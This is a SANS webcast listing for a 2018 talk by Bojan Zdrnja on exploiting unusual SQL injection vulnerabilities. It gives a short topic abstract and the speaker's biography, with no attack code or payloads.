SANSFIRE is right around the corner June 13-20 - Live Online, Register today!


To attend this webcast, login to your SANS Account or create your Account.

This webcast has been archived. To view the webcast login into your SANS Portal Account or create an account by clicking the "Get Registered" button on the right.Once you register, you can download the presentaion slides below.

Exploiting esoteric SQL injection vulnerabilities

  • Tuesday, February 20, 2018 at 10:30 AM EST (2018-02-20 15:30:00 UTC)
  • Bojan Zdrnja

You can now attend the webcast using your mobile device!



In spite of being at #1 in the OWASP Top 10 "list of vulnerabilities" since 2010, and posing an extreme risk SQL injection are still the most common vulnerability identified in web applications, no matter which language or framework is used.

We cover many examples on day 3 of the SEC542: Web App Penetration Testing and Ethical Hacking course.

In this webcast we will explain the basics behind SQL injection vulnerabilities and will then look at a few special examples where exploits were discovered on systems thought to be protected or not possible to be exploited.

We will look demonstrate how we can extract information from the backend databases by cleverly stimulating vulnerable web applications to extract one byte of data at a time.

If you are a red team member focused on web applications, or a blue team focused defender and which to see how these attacks work, we invite you to join us.

Speaker Bio

Bojan Zdrnja

Bojan worked for 5 years in the Faculty of Electrical Engineering at The University of Zagreb (Croatia) till 2002, when he moved to New Zealand. He was the team leader in several enterprise security projects for large customers, as well as a member of several Incident Response Teams in Croatian CERT. At the University of Auckland he architectured and implemented the entire enterprise e-mail system. In 2008 Bojan moved back to Croatia.

For years Bojan had a security column in a computer magazine in Croatia (Mreza). He wrote a book about computer viruses ("What are computer viruses", published in Croatia) and co-wrote a chapter in "AVIEN Malware Defense Guide for the Enterprise", a book released by Syngress in 2007.

He's probably most well known by his diaries for SANS Internet Storm Center in which he regularly analyzes new threats.

Need Help? Visit our FAQ page or email

Not able to attend a SANS webcast? All Webcasts are archived so you may view and listen at a time convenient to your schedule. View our webcast archive and access webcast recordings/PDF slides.